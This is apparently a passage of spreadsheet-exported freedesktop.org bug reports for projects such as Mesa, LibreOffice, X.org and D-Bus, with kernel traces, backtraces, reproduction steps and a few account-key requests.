 [491.787385] Code: 48 8b 0d 71 91 2d 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 0b 01 00 00 0f 05  3d 01 f0 ff ff 73 01 c3 48 8b 0d 3e 91 2d 00 f7 d8 64 89 01 48
 [491.787421] RSP: 002b:00007fff1824ef48 EFLAGS: 00000202 ORIG_RAX: 000000000000010b
 [491.787440] RAX: ffffffffffffffda RBX: 000055e0ef98b9b0 RCX: 00007f638493fd1a
 [491.787457] RDX: 000055e0ef98b9b0 RSI: 00007fff1824efd0 RDI: 00000000ffffff9c
 [491.787473] RBP: 0000000000000064 R08: fefefefefefefeff R09: fefefeff6b6073ff
 [491.787489] R10: 0000000000000063 R11: 0000000000000202 R12: 00007fff1824efd0
 [491.787505] R13: 00000000ffffff9c R14: 00007fff1824efa0 R15: 0000000000000063
 [491.787527] Modules linked in: i915(+) amdgpu chash gpu_sched ttm snd_hda_codec snd_hwdep snd_hda_core snd_pcm vgem i2c_i801 lpc_ich tg3 prime_numbers [last unloaded: i915]</t>
  </si>
  <si>
    <t>FONTCONFIG-101258</t>
  </si>
  <si>
    <t>LONG_FAMILY_NAMES check still broken</t>
  </si>
  <si>
    <t>Created attachment 131620
[PATCH] Fix testing PCF_CONFIG_OPTION_LONG_FAMILY_NAMES (CFLAGS need to be right)
The PCF_CONFIG_OPTION_LONG_FAMILY_NAMES check is still broken as of 2.12.3 as the check does not include the FREETYPE_CFLAGS and so is missing the includedir. 
The check fails because ft2build.h cannot be found.
The attached patch extends the LIBS/CFLAGS modification used to test the FreeType funcs and members to cover the test for the config flag.</t>
  </si>
  <si>
    <t>MESA-14916</t>
  </si>
  <si>
    <t>use of // breaks build</t>
  </si>
  <si>
    <t>Created attachment 14975
replace // with /* and */
In the recent commmit de1e9880f8b239768293f7f434a9117dfab20162 double slash was used for a comment. This breaks in my environment (Ubuntu Linux).</t>
  </si>
  <si>
    <t>DRI-65442</t>
  </si>
  <si>
    <t>[HSW IVB ILK SNB bisected] I-G-T/testdisplay -f cause *ERROR* mismatch in adjusted_mode.flags</t>
  </si>
  <si>
    <t>System Environment:
--------------------------------------------
Kernel: (drm-intel-next-queued)d7697eea3eec74c561d12887d892c53ac4380c00
Some additional commit info:
Author: Daniel Vetter 
Date:   Sun Jun 2 17:23:01 2013 +0200
    drm/i915: optimize vblank waits in set_base_atomic
Bug detail Description:
--------------------------------------------
I-G-T testdisplay causes call trace while setting up customized timing. This issue happens on HSW IVB SNB ILK. 
[   32.373406] Call Trace:
[   32.373427]  [] ? dump_stack+0xd/0x17
[   32.373461]  [] ? warn_slowpath_common+0x5f/0x77
[   32.373498]  [] ? warn_slowpath_fmt+0x45/0x4a
[   32.373539]  [] ? intel_modeset_check_state+0x904/0x94b [i915]
[   32.373587]  [] ? intel_set_mode+0x1d/0x27 [i915]
[   32.373635]  [] ? intel_crtc_set_config+0x583/0x73b [i915]
[   32.373688]  [] ? drm_mode_set_config_internal+0x19/0x40 [drm]
[   32.373751]  [] ? drm_mode_setcrtc+0x437/0x4e8 [drm]
[   32.373812]  [] ? drm_ioctl+0x290/0x3b5 [drm]
[   32.373862]  [] ? drm_mode_setplane+0x30f/0x30f [drm]
[   32.373901]  [] ? __schedule+0x60a/0x751
[   32.373935]  [] ? __wake_up+0x35/0x46
[   32.373968]  [] ? vfs_ioctl+0x1e/0x31
[   32.373999]  [] ? do_vfs_ioctl+0x3e9/0x42b
[   32.374033]  [] ? SyS_ioctl+0x4e/0x7d
[   32.374065]  [] ? system_call_fastpath+0x16/0x1b
[   32.374101] ---[ end trace ee545d65293e034b ]---
I attach the whole dmesg info in the attachment and this is a regression here is the bisect info:
Bisect result:
--------------------------------------------
045ac3b5629d9711531a408e92f9074db6afe7ce is the first bad commit
commit 045ac3b5629d9711531a408e92f9074db6afe7ce
Author: Jesse Barnes 
Date:   Tue May 14 17:08:26 2013 -0700
    drm/i915: add encoder get_config function v5
    We can use this for fetching encoder specific pipe_config state like
    mode flags adjusted clock etc.
    Just used for mode flags atm so we can check the pipe config state at
    mode set time.
    v2: get_config when checking hw state too
    v3: fix DVO and LVDS mode flags (Ville)
        get SDVO DTD for flag fetch (Ville)
    v4: use input timings (Ville)
        correct command used (Ville)
        remove gen4 check (Ville)
    v5: get DDI flag config too
    Signed-off-by: Jesse Barnes 
    Reviewed-by: Ville SyrjÃƒÂ¤lÃƒÂ¤  (v4)
    Tested-by: Paulo Zanoni  (the new hsw ddi stuff)
    Signed-off-by: Daniel Vetter 
:040000 040000 b2b8a7612a37028fb4ff2f62e372b70e9ce5179a 7b4bf7d42a2d1ce673ea2f405035e4c9c7dfe4a8 
M      drivers
Reproduce step:
--------------------------------------------
1. booting up machine
2. ./testdisplay -f 38.258008329121024600603607624(or other)
3. dmesg | grep Call Trace</t>
  </si>
  <si>
    <t>SYSTEMD-90619</t>
  </si>
  <si>
    <t>is_kdbus_available is broken</t>
  </si>
  <si>
    <t>is_kdbus_available always returns false.
The reason is that for KDBUS_CMD_BUS_MAKE there must be KDBUS_ITEM_MAKE_NAME and KDBUS_ITEM_BLOOM_PARAMETER. According to kdbus_cmd_bus_make() they are mandatory.</t>
  </si>
  <si>
    <t>hristo</t>
  </si>
  <si>
    <t>LIBREOFFICE-41431</t>
  </si>
  <si>
    <t>FILESAVE: SaveAs with invalid filename give no warning that file is not saved</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. Create a text document
2. SaveAs a filename with invalid characters (Like A&gt;B&gt;C)
3. File is saved as A no extension cannot be opened
Current behavior: File is saved with different filename than specified. No warning message is given
Expected behavior: Warning that file cannot be saved as specified with opportunity for user to provide a valid filename.</t>
  </si>
  <si>
    <t>habruulsema</t>
  </si>
  <si>
    <t>XORG-1609</t>
  </si>
  <si>
    <t>control not interpretted</t>
  </si>
  <si>
    <t>When I start up Xnest and an xterm within that Xnest the control key seems to
be ignored.  For example when I press ^P p is displayed.
Interestingly my arrow keys do work.
This fails the same way when I am using vncviewer.</t>
  </si>
  <si>
    <t>mmilgram</t>
  </si>
  <si>
    <t>LIBREOFFICE-70474</t>
  </si>
  <si>
    <t>Random number generation weak with Rnd in BASIC</t>
  </si>
  <si>
    <t>Created attachment 87644
Test file
The RAND() function of Calc was fixed on bug 33365. Yet the same bug is present with the Rnd random number generation function of BASIC as well.
Even with as few records as 1000 the random numbers repeat themselves several times. Test document (ODS) with test macro attached.
TEST PROCEDURE:
1. Open the attached document
2. Click the Generate button to (re-)generate 1000 numbers. Wait for Generation Status to change from Started... to Ready
EXPECTED RESULTS:
2. Cell D1 shows 1.00000000 (i.e. no repetition of values in the B column)
ACTUAL RESULTS:
2. Value of D1 always bigger than 1.00000000 (between 1.02200000 and 1.04400000 on just a few tests) due to many repeated values in the B column. (Column C shows how many times a number is repeated.)
WinXP Home 32 bit LO 4.0.5.2 release
NOTES:
- The issue does not occur on with the test file attached to bug 33365 which tests the RAND() function of Calc. To achieve comparable results my attached file is based on that file and uses the same evaluation methods.
- Usage of the Randomize generator initialization function before the first Rnd usage does not work around the problem.
- Calc RAND() fix commit http://cgit.freedesktop.org/libreoffice/core/commit/?id=8450a99c744e9005f19173e4df35d65640bcf5c4 says that seed() initialises the state of the global random number generator and it should only be called once at the start of the main programme. So maybe the latter information should be added to the description of the Randomize function in LO help. Because according to that information additional later seeding of the random number generator would make it loose the entropy it has accumulated so far. (Assuming it does accumulate it continuously since application start.)</t>
  </si>
  <si>
    <t>klasse</t>
  </si>
  <si>
    <t>LIBREOFFICE-75622</t>
  </si>
  <si>
    <t>FILEOPEN: very slow on opening this slide with table</t>
  </si>
  <si>
    <t>Created attachment 94919
single slide impress that it very slow on loading
The attached file (a single slide Impress file) is very slow to open in LO 4.2.1.1. Both on Mac OSX 10.9 and on Win8.1.
We use this as template in our company to display our product roadmap the original presentation had many (10+) of these slides and takes 5 minutes or so to open. Given the confidential nature I can not attach that version but I have nailed it down to the table we use as a backdrop.
File opens normally in 4.5.1.2.</t>
  </si>
  <si>
    <t>theomuys</t>
  </si>
  <si>
    <t>LIBREOFFICE-42520</t>
  </si>
  <si>
    <t>: No uninstaller registration is made upon freshly installing v3.4.3 final</t>
  </si>
  <si>
    <t>Problem description: -
No uninstall entry is found anywhere on the system after doing a clean install of LibreOffice v3.4.3. 
Either in the Programs &amp; Features section of the Control Panel in Vista &amp; Windows 7 (64 bit) or the Add/Remove Hardware of the older control panel in Windows XP there are no entries found for LibreOffice. 
There is no dedicated uninstaller application found in any of the directories created by LibreOffice.
Microsoft's Windows Installer Clean Up Utility which usually finds theses things does not list LibreOffice as installed on a Windows XP Vista or Windows 7 (64 bit) system.
There is no safe way for the end user to clear LibreOffice from the system in preparation for upgrade other than by using a system restore or re-imaging the system - which is most impractical especially if one wishes to do this some time after installing LibreOffice and having to roll back in time to a much earlier system state.
Please can an uninstaller be made for future version and can someone advise on the safest way I can test the complete removal of LibreOffice v3.4.3 in preparation for future upgraded of LibreOffice?
Steps to reproduce:
1. .... Install the latest version of LibreOffice on a clean system with no previous version of LibreOffice installed
2. .... Search for the uninstall entry in the Control Panel (Programs &amp; Features or Add/Remove Software)
3. .... Search the LibreOffice directories for an uininstaller or use 3rd party uninstaller tools like Microsoft Install Clean Up Utility or CCleaner or jv16 Power Tools and find no entries for LibreOffice in any of them.
Current behaviour: Impossible to safely and thoroughly remove LibreOffice from a Windows system.
Expected behavior: To have a regular uninstall feature in the control panel to correctly and safely uninstall all aspects of LibreOffice.
Platform (if different from the browser): Windows 7 64 Bit (all versions) Vista &amp; XP (pro &amp; Home).
Browser: Mozilla/5.0 (Windows NT 6.1 WOW64) AppleWebKit/535.2 (KHTML like Gecko) Chrome/15.0.874.106 Safari/535.2</t>
  </si>
  <si>
    <t>jamesbuton</t>
  </si>
  <si>
    <t>LIBREOFFICE-48003</t>
  </si>
  <si>
    <t>FORMATTING reproduceable crash when write a word with two capital letters and type space</t>
  </si>
  <si>
    <t>Thats it. Nearly everytime I write a word with two capital letter at the beginnung and press 'space' to continue with the next LibreOffice Crashes. 
Example: SUnday ...
LibreOffice then saves the document and I can continue when I restartet LibreOffice.</t>
  </si>
  <si>
    <t>marcusleip</t>
  </si>
  <si>
    <t>LIBREOFFICE-83529</t>
  </si>
  <si>
    <t>LibreOffice tries to make user's config file with wrong permission.</t>
  </si>
  <si>
    <t>-----Details-----
When I am menber of the group root LibreOffice generates some config file with root group's ownership on initial startup.
$ find /home/myuser/.config/libreoffice/ -group root
/home/username/.config/libreoffice/4/user/config/standard.soe
/home/username/.config/libreoffice/4/user/config/standard.soc
/home/username/.config/libreoffice/4/user/config/modern.sog
/home/username/.config/libreoffice/4/user/config/standard.sod
/home/username/.config/libreoffice/4/user/config/gallery.soc
/home/username/.config/libreoffice/4/user/config/classic.sog
/home/username/.config/libreoffice/4/user/config/html.soc
/home/username/.config/libreoffice/4/user/config/styles.sod
/home/username/.config/libreoffice/4/user/config/palette.soc
/home/username/.config/libreoffice/4/user/config/tango.soc
/home/username/.config/libreoffice/4/user/config/autotbl.fmt
/home/username/.config/libreoffice/4/user/config/hatching.soh
/home/username/.config/libreoffice/4/user/config/arrowhd.soe
/home/username/.config/libreoffice/4/user/config/cmyk.soc
/home/username/.config/libreoffice/4/user/config/standard.soh
/home/username/.config/libreoffice/4/user/config/web.soc
/home/username/.config/libreoffice/4/user/config/scribus.soc
/home/username/.config/libreoffice/4/user/config/standard.sog
/home/username/.config/libreoffice/4/user/config/standard.sob
/home/username/.config/libreoffice/4/user/config/libreoffice.soc
/home/username/.config/libreoffice/4/user/autotext/mytexts.bau
/home/username/.config/libreoffice/4/user/basic/script.xlc
/home/username/.config/libreoffice/4/user/basic/dialog.xlc
/home/username/.config/libreoffice/4/user/basic/Standard/script.xlb
/home/username/.config/libreoffice/4/user/basic/Standard/dialog.xlb
/home/username/.config/libreoffice/4/user/basic/Standard/Module1.xba
/home/username/.config/libreoffice/4/user/database/biblio.odb
/home/username/.config/libreoffice/4/user/database/evolocal.odb
/home/username/.config/libreoffice/4/user/database/biblio/biblio.dbf
/home/username/.config/libreoffice/4/user/database/biblio/biblio.dbt
/home/username/.config/libreoffice/4/user/gallery/sg30.sdv
/home/username/.config/libreoffice/4/user/gallery/sg30.thm
The function oslChangeFileModes in sal/osl/unx/file_misc.cxx changes only uid.
//---------
if ( nUID != getuid() )
    {
        nUID=getuid()
    }
//---------
And I suppose it should change gid too.
//---------
if ( nUID != getuid() )
    {
        nUID=getuid()
    }
if ( nGID != getgid() )
    {
        nGID=getgid()
    }
//---------
-----Steps to reproduce-----
1. Add user to group root.
2. Remove ~/.config/libreoffice/
3. Start any LibreOffice application.
-----Expected result-----
All files in ~/.config/libreoffice/ should be owned by myuser:myusergroup.
-----Actual result-----
Some files  are owned by myuser:root.
I'm sorry if my English is hard to understand. 
Please ask if you would like me to explain something again.</t>
  </si>
  <si>
    <t>archer_ame</t>
  </si>
  <si>
    <t>MESA-86195</t>
  </si>
  <si>
    <t>Lightswork video editor segfaults</t>
  </si>
  <si>
    <t>This app is very unstable with radeonsi but works fine on intel.
HD 7790
mesa-git\llvm-svn 11.10.14
Program received signal SIGSEGV Segmentation fault.
0x00007dfa9b7807c8 in std::vector &gt;::_M_fill_insert(__gnu_cxx::__normal_iterator &gt; &gt; unsigned long llvm::MachineOperand* const&amp;) ()
   from /usr/lib64/libLLVM-3.6svn.so
(gdb) bt
#0  0x00007dfa9b7807c8 in std::vector &gt;::_M_fill_insert(__gnu_cxx::__normal_iterator &gt; &gt; unsigned long llvm::MachineOperand* const&amp;) ()
    at /usr/lib64/libLLVM-3.6svn.so
#1  0x00007dfa9b780f41 in llvm::MachineRegisterInfo::MachineRegisterInfo(llvm::MachineFunction const*) () at /usr/lib64/libLLVM-3.6svn.so
#2  0x00007dfa9b74c99a in llvm::MachineFunction::MachineFunction(llvm::Function const* llvm::TargetMachine const&amp; unsigned int llvm::MachineModuleInfo&amp;) () at /usr/lib64/libLLVM-3.6svn.so
#3  0x00007dfa9b7508cb in llvm::MachineFunctionAnalysis::runOnFunction(llvm::Function&amp;) () at /usr/lib64/libLLVM-3.6svn.so
#4  0x00007dfa9b46caef in llvm::FPPassManager::runOnFunction(llvm::Function&amp;) () at /usr/lib64/libLLVM-3.6svn.so
#5  0x00007dfa9b46cb7b in llvm::FPPassManager::runOnModule(llvm::Module&amp;) () at /usr/lib64/libLLVM-3.6svn.so
#6  0x00007dfa9b46f225 in llvm::legacy::PassManagerImpl::run(llvm::Module&amp;) () at /usr/lib64/libLLVM-3.6svn.so
#7  0x00007dfa9b8ff303 in  () at /usr/lib64/libLLVM-3.6svn.so
#8  0x00007dfa9b8ff510 in LLVMTargetMachineEmitToMemoryBuffer () at /usr/lib64/libLLVM-3.6svn.so
#9  0x00007dfa9d0458af in radeon_llvm_compile (M=0x7ffaa0a17bc4 binary=0x7fff319ca220 gpu_family=0x7dfa9d1589b5 bonaire dump=0)
    at radeon_llvm_emit.c:185
#10 0x00007dfa9cfa96a0 in si_compile_llvm (sscreen=0x18a02b0 shader=0x1be6900 mod=0x7ffaa0a17bc4) at si_shader.c:2601
#11 0x00007dfa9cfa9d8e in si_shader_create (sscreen=0x18a02b0 shader=0x1be6900) at si_shader.c:2800
#12 0x00007dfa9cfafa19 in si_shader_select (ctx=0x1988d20 sel=0x1bd8800) at si_state.c:2279
#13 0x00007dfa9cfb1bb8 in si_update_derived_state (sctx=0x1988d20) at si_state_draw.c:652
#14 0x00007dfa9cfb1dda in si_draw_vbo (ctx=0x1988d20 info=0x7fff319d17f0) at si_state_draw.c:919
#15 0x00007dfa9ccb7fc9 in blitter_draw (ctx=
    0x19b2c30 x1= y1= x2= y2= depth= num_instances=1)
    at ./util/u_draw.h:99
#16 0x00007dfa9ccb80e1 in util_blitter_draw_rectangle (blitter=
    0x19b2c30 x1=0 y1=0 x2=1920 y2=1080 depth=0 type= attrib=0x7fff319d19f0) at util/u_blitter.c:1156
#17 0x00007dfa9d038fe2 in r600_draw_rectangle (blitter=
    0x19b2c30 x1=0 y1=0 x2=1920 y2=1080 depth=0 type= attrib=0x7fff319d19f0) at r600_pipe_common.c:56
#18 0x00007dfa9ccbaab2 in util_blitter_blit_generic (blitter=
    0x19b2c30 dst=0x1bd8470 dstbox=0x7fff319d1b10 src=0x1be23e0 srcbox=0x7fff319d1cf0 src_width0=1920 src_height0=1080 mask=63 filter=0 scissor=0x0) at util/u_blitter.c:1619
#19 0x00007dfa9cf9d81a in si_resource_copy_region (ctx=0x1988d20 dst=0x1be34f0 dst_level=0 dstx=0 dsty=0 dstz=0 src=0x1be4370 src_level=0 src_box=0x7fff319d1cf0) at si_blit.c:664
#20 0x00007dfa9cfa2e7c in si_dma_copy (ctx=0x1988d20 dst=0x1be34f0 dst_level=0 dstx=0 dsty=0 dstz=0 src=0x1be4370 src_level=0 src_box=0x7fff319d1cf0) at si_dma.c:322
#21 0x00007dfa9d03e063 in r600_copy_from_staging_texture (ctx= rtransfer=) at r600_texture.c:105
#22 0x00007dfa9d03e683 in r600_texture_transfer_unmap (ctx=0x1988d20 transfer=0x1be79a0) at r600_texture.c:1079
#23 0x00007dfa9ccd5f42 in u_transfer_unmap_vtbl (pipe= transfer=) at util/u_transfer.c:138
#24 0x00007dfa9cb98877 in st_texture_image_unmap (st= stImage= slice=)
    at ../../src/gallium/auxiliary/util/u_inlines.h:481
#25 0x00007dfa9cb6ea59 in st_UnmapTextureImage (ctx= texImage=0x1be78d0 slice=0)
    at ../../src/mesa/state_tracker/st_cb_texture.c:283
#26 0x00007dfa9cb1a32f in store_texsubimage (ctx=0x7dfa99d41010 texImage=0x1be78d0 xoffset=0 yoffset=0 zoffset= width=1920 height=1080 depth= format=32993 type=5121 pixels=0x251deb0 packing=0x7dfa99d5c6e0 caller=0x7dfa9d07287f glTexSubImage)
    at ../../src/mesa/main/texstore.c:2026
#27 0x00007dfa9cb1a4fb in _mesa_store_texsubimage (ctx= dims= texImage= xoffset= yoffset= zoffset= width=1920 height=1080 depth=1 format=32993 type=5121 pixels=0x251deb0 packing=0x7dfa99d5c6e0)
    at ../../src/mesa/main/texstore.c:2083
#28 0x00007dfa9cb72be3 in st_TexSubImage (ctx=0x7dfa99d41010 dims=2 texImage=0x1be78d0 xoffset=0 yoffset=0 zoffset=0 width=1920 height=1080 depth=1 format=32993 type=5121 pixels=0x251deb0 unpack=0x7dfa99d5c6e0) at ../../src/mesa/state_tracker/st_cb_texture.c:852
#29 0x00007dfa9cb72cd8 in st_TexImage (ctx=0x7dfa99d41010 dims=2 texImage=0x1be78d0 format=32993 type=5121 pixels=0x251deb0 unpack=0x7dfa99d5c6e0) at ../../src/mesa/state_tracker/st_cb_texture.c:876
#30 0x00007dfa9cb0b658 in teximage (ctx=0x7dfa99d41010 compressed= dims=2 target=3553 level=0 internalFormat=6408 width=1920 height=1080 depth=1 border=0 format=32993 type=5121 imageSize=0 pixels=0x251deb0) at ../../src/mesa/main/teximage.c:3326
#31 0x00007dfa9cb0c222 in _mesa_TexImage2D (target= level= internalFormat= width= height= border= format=32993 type=5121 pixels=0x251deb0) at ../../src/mesa/main/teximage.c:3365
#32 0x00007ffaa969ca94 in OpenGLImage::allocTexture(XY const&amp; void*) () at /usr/lib/lightworks/libOS.so
#33 0x00007ffaa969d063 in OpenGLImage::OpenGLImage(Lw::Ptr iGPUImage::eFormat) ()</t>
  </si>
  <si>
    <t>pontostroy</t>
  </si>
  <si>
    <t>MESA-23727</t>
  </si>
  <si>
    <t>[G45] GPU hang with OpenGL game Hive Rise</t>
  </si>
  <si>
    <t>Running Ubuntu Karmic (updated as of 2009-09-05):
 - x86-64 2.6.31-9-generic (based on 2.6.31-rc8)
 - MESA 7.6.0~git20090817.7c422387-0ubuntu3 from stock Karmic repo
 - xserver-xorg 7.4+3ubuntu5
 - xserver-xorg-video-intel 2.8.1-1ubuntu1
 - system is Thinkpad T400 w/ current BIOS Intel G45 chipset
  -&gt; internal 1440x900 panel active VGA inactive
 - reproducer: run (32-bit) for 5-10 mins: http://www.hiverise.com/webdownload/hiverisedownload.exe?v=linux
  -&gt; though I've experienced GPU hanging with other openGL applications
# cat /sys/kernel/debug/dri/0/i915_error_state
Time: 1252150251 s 297059 us
EIR: 0x00000010
  PGTBL_ER: 0x01000000
  INSTPM: 0x00000000
  IPEIR: 0x00000000
  IPEHR: 0x79000002
  INSTDONE: 0x808fffff
  ACTHD: 0x0793a1cc
  INSTPS: 0x8001e022
  INSTDONE1: 0x9d9fffae
$ dmesg
render error detected EIR: 0x00000010
  IPEIR: 0x00000000
  IPEHR: 0x79000002
  INSTDONE: 0x808fffff
  INSTPS: 0x8001e022
  INSTDONE1: 0x9d9fffae
  ACTHD: 0x0793a1cc
page table error
  PGTBL_ER: 0x01000000
secondary effects:
[drm:i915_handle_error] *ERROR* EIR stuck: 0x00000010 masking
INFO: task i915/1:856 blocked for more than 120 seconds.
echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs disables this message.
i915/1        D 0000000000000000     0   856      2 0x00000000
 ffff88015456fd70 0000000000000046 ffff88015456fd70 0000000000015580
 ffff8801570247c0 0000000000015580 0000000000015580 0000000000015580
 0000000000015580 ffff8801570247c0 0000000000015580 0000000000015580
Call Trace:
 [] __mutex_lock_slowpath+0xd7/0x160
 [] mutex_lock+0x26/0x50
 [] i915_gem_retire_work_handler+0x38/0x90 [i915]
 [] ? i915_gem_retire_work_handler+0x0/0x90 [i915]
 [] run_workqueue+0x95/0x170
 [] worker_thread+0xa4/0x120
 [] ? autoremove_wake_function+0x0/0x40
 [] ? worker_thread+0x0/0x120
 [] kthread+0xa6/0xb0
 [] child_rip+0xa/0x20
 [] ? kthread+0x0/0xb0
 [] ? child_rip+0x0/0x20
INFO: task Xorg:2772 blocked for more than 120 seconds.
echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs disables this message.
Xorg          D 0000000000000000     0  2772   2771 0x00400004
 ffff88014e02bc58 0000000000000082 ffff88014e02bbf8 0000000000015580
 ffff88014e06b110 0000000000015580 0000000000015580 0000000000015580
 0000000000015580 ffff88014e06b110 0000000000015580 0000000000015580
Call Trace:
 [] __mutex_lock_slowpath+0xd7/0x160
 [] mutex_lock+0x26/0x50
 [] i915_gem_gtt_pwrite_fast+0x5e/0x150 [i915]
 [] i915_gem_pwrite_ioctl+0x1a9/0x1d0 [i915]
 [] drm_ioctl+0x17e/0x3a0 [drm]
 [] ? i915_gem_pwrite_ioctl+0x0/0x1d0 [i915]
 [] ? __hrtimer_start_range_ns+0x185/0x350
 [] ? autoremove_wake_function+0x0/0x40
 [] vfs_ioctl+0x7c/0xa0
 [] do_vfs_ioctl+0x79/0x370
 [] ? vfs_read+0x12f/0x1a0
 [] sys_ioctl+0x81/0xa0
 [] system_call_fastpath+0x16/0x1b</t>
  </si>
  <si>
    <t>LIBREOFFICE-78167</t>
  </si>
  <si>
    <t>FILEOPEN: General error. Input/Output error. Opening ODT file.</t>
  </si>
  <si>
    <t>Created attachment 98315
the file that i cant open.
Problem description: 
I've been working with a .odt file for some days without issues but today i cant open it. When i try to open the file the application never start and an error message is displayed: General error. Input/Output error. (title: LibreOffice 4.2.3.3)
My SO is Ubuntu 12.04 64bits.
Operating System: Ubuntu
Version: 4.2.3.3 release</t>
  </si>
  <si>
    <t>cimarron.argento</t>
  </si>
  <si>
    <t>REALMD-55704</t>
  </si>
  <si>
    <t>Try to restart the accounts-daemon after joining/leaving</t>
  </si>
  <si>
    <t>realmd tries to provide guarantees that the domain accounts are usable
locally by the time the Join() call completes. However the accountsservice
uses getpwnam() which caches the list of modules in /etc/nsswitch.conf
When we change nsswitch.conf we really need to have accountsservice tell
getpwnam() to reload its module list or something like that. But as an
interim fix we just restart the accounts-daemon process.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-30091</t>
  </si>
  <si>
    <t>Request for account for ooo-build</t>
  </si>
  <si>
    <t>real name: AndrÃ© Schnabel
email address: andre.schnabel@gmx.net
preferred account name: andreschnabel
GPG public key
RSA SSH public key</t>
  </si>
  <si>
    <t>WAYLAND-73815</t>
  </si>
  <si>
    <t>Weston does not handle a window being re-sized from two sides</t>
  </si>
  <si>
    <t>I think this is a Weston bug because there are no global coords that the clients would be using and this behaviour seems to be similar through multiple toolkits that support it.
Trying to resize a window from two corners or two sides at the same time (using weston multiseat) causes the window to jump around the screen erratically until it eventually jumps offscreen.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-15842</t>
  </si>
  <si>
    <t>XQuartz Bugzilla Request</t>
  </si>
  <si>
    <t>Hi  I'd like to actually start using freedesktop.org's bugzilla rather than our trac over at http://xquartz.macosforge.org for apple stuff so I'd like to make some requests about the configuration:
1) Please rename the 'DDX/darwin' component under the xorg product to 'DDX/xquartz'
2) Please setup a rule such that all new bugs in the DDX/xquartz component are assigned to me
3) Please setup a rule such that all new bugs in xorg with Mac OSX as the OS are assigned to me
Thanks
Jeremy</t>
  </si>
  <si>
    <t>DBUS-11876</t>
  </si>
  <si>
    <t>EXTERNAL authentication fails on setuid applications</t>
  </si>
  <si>
    <t>The EXTERNAL authentication method doesn't work if the effective UID of the client is different from its real UID which happens for instance on setuid applications.
That's because the client sends its real UID while the server checks the effective UID.
Here's a pseudo-callstack of the client:
1/ handle_client_response_mech()
2/ dbus_credentials_add_from_current_process()
3/ _dbus_credentials_add_unix_uid()
4/ _dbus_getuid()
5/ getuid()
While the server gets the effective uid in _dbus_read_credentials_socket() (through SO_PEERCRED and other methods).
I guess _dbus_credentials_add_unix_uid() should call _dbus_geteuid() (which doesn't exist yet) but i'm not sure about how much code depends on the current behaviour of that function.</t>
  </si>
  <si>
    <t>scox</t>
  </si>
  <si>
    <t>PORTLAND-12818</t>
  </si>
  <si>
    <t>xdg-mime under GNOME has a bug when the file contains MIME in its name</t>
  </si>
  <si>
    <t>The command to get the mimetype is :
gnomevfs-info /tmp/xdg-openMIME.txt 2&gt; /dev/null | grep MIME | cut -d : -f 2 | sed s/^ //
So we get :
[pterjan@plop libgnomevfs]$ xdg-mime query filetype /tmp/MIME.txt
MIME.txt
text/plain</t>
  </si>
  <si>
    <t>pterjan</t>
  </si>
  <si>
    <t>MESA-34418</t>
  </si>
  <si>
    <t>SuperTuxRacer 0.7/Warzone 2100 and r300g MemoryFault (64bit only)</t>
  </si>
  <si>
    <t>SuperTuxRacer 0.7(which is Irlicht based) Memory Faults on initialization when using gallium libGL.so but it works w/o any problems using Mesa Classic libGL.
I gues it happens due to VBO bugs in r300g which arent avaible in classic Mesa.
I know it works using r600g because of answers from many persons.
I am using fresh airlied's D-R-T kernel with DDX/DRI/Mesa from Master.
I got multilib system but STK and 99% apps I am using are 64bit. Gfx card is FireGL V5200/Radeon X1600 inside T60p.
There are logs etc:
http://carme.pld-linux.org/~evil/radeon/STK_r300g/
There is original thread:
http://phoronix.com/forums/showthread.php?33119-SuperTuxRacer-0.7-and-r300g-MemoryFault
And like Qaridarium stated I got also similar problem with warzone2100 (when looking at gdb backtrace related to VBO/Vertices)
After some playing with vars I found that game STK doesnt work with LIBGL_ALWAYS_SOFTWARE=1 (Gallium on softpipe) but works with LIBGL_ALWAYS_INDIRECT=1 (because of fallback to Mesa Classic).
Not sure about warzone witg softpipe because it segfaults after starting campaign and waiting for menu on siftpipe would take a years.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-16044</t>
  </si>
  <si>
    <t>Add new ssh key and GPG key to account 'bbyer'</t>
  </si>
  <si>
    <t>My ssh key was disabled so I'm attaching a new one.   (Note that I had a GPG key registered for this account too but it doesn't seem to be working with the key-bot so I'm re-attaching it here too.)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv0IRcu+QDsav+1ehY5zBA/U3gT+iowmAzSrLzkUFfhGps50riHmxVV7vT9QjEHBFV7esD3yQZNfPtlEQuoyzIuz5FvNp47J9GbgPoaP6Wl20b2lT7BOj3f2JO5PQY6H3lJqnzgeBXG7FAHmSuVjk1QFYb1ay7gyKE73uLaeJf8eddPmTi0V1nSML2WNFQFUOZqowuEWBkyducMlw0ivGsMY8R3RLFgoiGm7+kZNG2OBlu+F7pgUTdPJy60hpbThlcgHYD8tjmqZVWXVFsn1NGOeYesSN783ODucD/fcePKYZMnFL0f8yt2Kg7v/sT/vqQZoQTppScfTU0VniVwF4+w== bbyer@apple.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)
iEYEARECAAYFAkgzrsUACgkQ1bKZR4TvFLbV1gCfXnBBMaqhmGZ6B3hl3IE1nzV+
PMAAn1AtxvxQmiJdJVCgQz+0GZ6DBUqS
=EBr1
-----END PGP SIGNATURE-----
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.9 (Darwin)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==
=E4z3
-----END PGP PUBLIC KEY BLOCK-----</t>
  </si>
  <si>
    <t>LIBREOFFICE-68319</t>
  </si>
  <si>
    <t>Chinese Conversion Crashes</t>
  </si>
  <si>
    <t>Something went wrong with the modified Chinese Conversion tool.
Paste this on a new doc: å‡ºé›¢ å‡ºè¦ é é›¢
Use the tool to convert from Traditional to Simplified.
CRASH!
Upon recovery one character is converted: the first é›¢ to ç¦»
The other é›¢ remains as it was.
Upon further testing I found out that if I were to highlight just the Chinese character before running the tool it works find.
With more testing here's what I notice:
If the range of conversion includes any non-Chinese character in this case comma or space upon reaching that character CRASH!</t>
  </si>
  <si>
    <t>LIBREOFFICE-71909</t>
  </si>
  <si>
    <t>Pootle mess up strings</t>
  </si>
  <si>
    <t>Created attachment 89624
Screendump
